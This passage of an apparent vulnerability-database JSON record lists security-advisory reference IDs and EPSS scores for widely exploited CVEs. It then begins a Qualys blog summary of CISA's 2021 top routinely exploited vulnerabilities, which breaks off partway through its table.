"THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A2FE619CD27EBEC2F6B0C62ED026F02C", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "THREATPOST:B2DDD79594EACBEAC10B02C533235986", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B7DF4F28933004E3E4D52762786306C4", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:B8EE84454BCC4614F524D8A4901907C3", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BC99709891AA93FC7767B53445FC2736", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:D7E3369CE997E9EF8A0586B994225257", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DAA85537BDD9022F1F98B328EFF7B7B9", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E44D0A1C3C7C76586EBC905270FFAC34", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EA8274414AC42B3EF48CA27D45659736", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:EED27183B3F49112A9E785EA56534781", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F084C5D91E4F66092F5449922C34C4CE", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FF8B5ACCCE8A1CE6B8A830B1D3E9E316", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trellix", "idList": ["TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "TRELLIX:21227249912602DD6E11D3B19898A7FF", "TRELLIX:357BDB16F9C97C350D8CFF381DE2C04E", "TRELLIX:39F5630F37B0A70500113404A73FE414", "TRELLIX:5C6A93572FA76C5B51C026E0EE5AC599", "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "TRELLIX:751B240CA6EC691086E07D2AAFAF16BF", "TRELLIX:78F3E55FEB758A52865B523C8DE8162F", "TRELLIX:7B9C31B3E2F1A079101A700230D5A5C0", "TRELLIX:908157CFA8050AA23921170E873187E1", "TRELLIX:C3BC4A8730F3B1E4C9A82C07C31138D4", "TRELLIX:CC89DE5CDC16462BF1BBC90EE93DEE24", "TRELLIX:D3CC9DD7452C6A1D346229DE526BBE46", "TRELLIX:D57FEAD5DBF6D915430C791AC26C10CC", "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1", "USN-4705-1", "USN-4705-2", "USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472", "UB:CVE-2021-3156", "UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veeam", "idList": ["VEEAM:KB4254"]}, {"type": "veracode", "idList": ["VERACODE:25767", "VERACODE:27548", "VERACODE:29144", "VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "virtuozzo", "idList": ["VZA-2021-004", "VZA-2021-005"]}, {"type": "vmware", "idList": ["VMSA-2021-0002", "VMSA-2021-0010", "VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:107445D672F037011ADA9A0DA9FB8292", "WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdi", "idList": ["ZDI-20-258", "ZDI-21-819", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-27607", "1337DAY-ID-27617", "1337DAY-ID-27662", "1337DAY-ID-28811", "1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-33140", "1337DAY-ID-33683", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34553", "1337DAY-ID-35085", "1337DAY-ID-35274", "1337DAY-ID-35741", "1337DAY-ID-35772", "1337DAY-ID-35779", "1337DAY-ID-35785", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36472", "1337DAY-ID-36558", "1337DAY-ID-36564", "1337DAY-ID-36667", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37051", "1337DAY-ID-37080", "1337DAY-ID-37126", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37230", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37781", "1337DAY-ID-37889", "1337DAY-ID-38098", "1337DAY-ID-38189", "1337DAY-ID-38193", "1337DAY-ID-38195", "1337DAY-ID-38421"]}]}, "score": {"value": 11.4, "vector": "NONE"}, "epss": [{"cve": "CVE-2017-0199", "epss": 0.97449, "percentile": 0.99908, "modified": "2023-05-01"}, {"cve": "CVE-2017-11882", "epss": 0.9743, "percentile": 0.99887, "modified": "2023-05-02"}, {"cve": "CVE-2018-0171", "epss": 0.88904, "percentile": 0.98157, "modified": "2023-05-02"}, {"cve": "CVE-2018-13379", "epss": 0.97505, "percentile": 0.99963, "modified": "2023-05-02"}, {"cve": "CVE-2019-11510", "epss": 0.97517, "percentile": 0.99972, "modified": "2023-05-02"}, {"cve": "CVE-2019-18935", "epss": 0.8927, "percentile": 0.98183, "modified": "2023-05-02"}, {"cve": "CVE-2019-19781", "epss": 0.975, "percentile": 0.99956, "modified": "2023-05-02"}, {"cve": "CVE-2020-0688", "epss": 0.97379, "percentile": 0.99829, "modified": "2023-05-02"}, {"cve": "CVE-2020-1472", "epss": 0.97362, "percentile": 0.99808, "modified": "2023-05-01"}, {"cve": "CVE-2020-2509", "epss": 0.00179, "percentile": 0.53532, "modified": "2023-05-01"}, {"cve": "CVE-2021-1675", "epss": 0.96888, "percentile": 0.99507, "modified": "2023-05-01"}, {"cve": "CVE-2021-20016", "epss": 0.02531, "percentile": 0.88593, "modified": "2023-05-01"}, {"cve": "CVE-2021-20038", "epss": 0.93351, "percentile": 0.98573, "modified": "2023-05-02"}, {"cve": "CVE-2021-21972", "epss": 0.97426, "percentile": 0.99883, "modified": "2023-05-01"}, {"cve": "CVE-2021-21985", "epss": 0.9745, "percentile": 0.99909, "modified": "2023-05-01"}, {"cve": "CVE-2021-22893", "epss": 0.9698, "percentile": 0.99559, "modified": "2023-05-01"}, {"cve": "CVE-2021-26084", "epss": 0.97475, "percentile": 0.99938, "modified": "2023-05-01"}, {"cve": "CVE-2021-26855", "epss": 0.97532, "percentile": 0.99982, "modified": "2023-05-01"}, {"cve": "CVE-2021-26857", "epss": 0.07213, "percentile": 0.92995, "modified": "2023-05-01"}, {"cve": "CVE-2021-26858", "epss": 0.11092, "percentile": 0.94264, "modified": "2023-05-01"}, {"cve": "CVE-2021-27065", "epss": 0.95076, "percentile": 0.98886, "modified": "2023-05-01"}, {"cve": "CVE-2021-27101", "epss": 0.00785, "percentile": 0.7889, "modified": "2023-05-01"}, {"cve": "CVE-2021-27102", "epss": 0.00083, "percentile": 0.33889, "modified": "2023-05-01"}, {"cve": "CVE-2021-27103", "epss": 0.01096, "percentile": 0.82292, "modified": "2023-05-01"}, {"cve": "CVE-2021-27104", "epss": 0.00819, "percentile": 0.79412, "modified": "2023-05-01"}, {"cve": "CVE-2021-27852", "epss": 0.01106, "percentile": 0.82357, "modified": "2023-05-01"}, {"cve": "CVE-2021-31207", "epss": 0.97157, "percentile": 0.9965, "modified": "2023-05-01"}, {"cve": "CVE-2021-3156", "epss": 0.94383, "percentile": 0.98743, "modified": "2023-05-01"}, {"cve": "CVE-2021-34473", "epss": 0.97375, "percentile": 0.99825, "modified": "2023-05-01"}, {"cve": "CVE-2021-34523", "epss": 0.97463, "percentile": 0.99924, "modified": "2023-05-01"}, {"cve": "CVE-2021-34527", "epss": 0.9685, "percentile": 0.99482, "modified": "2023-05-01"}, {"cve": "CVE-2021-35464", "epss": 0.97391, "percentile": 0.99847, "modified": "2023-05-01"}, {"cve": "CVE-2021-40444", "epss": 0.96903, "percentile": 0.99515, "modified": "2023-05-02"}, {"cve": "CVE-2021-40539", "epss": 0.97508, "percentile": 0.99968, "modified": "2023-05-02"}, {"cve": "CVE-2021-42237", "epss": 0.97546, "percentile": 0.99991, "modified": "2023-05-02"}, {"cve": "CVE-2021-44228", "epss": 0.97581, "percentile": 0.99999, "modified": "2023-05-02"}], "vulnersScore": 11.4}, "_state": {"dependencies": 1695452164, "score": 1695452611, "epss": 0}, "_internal": {"score_hash": "b7520fbce166bc62076aebcf10096872"}}

{"qualysblog": [{"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| 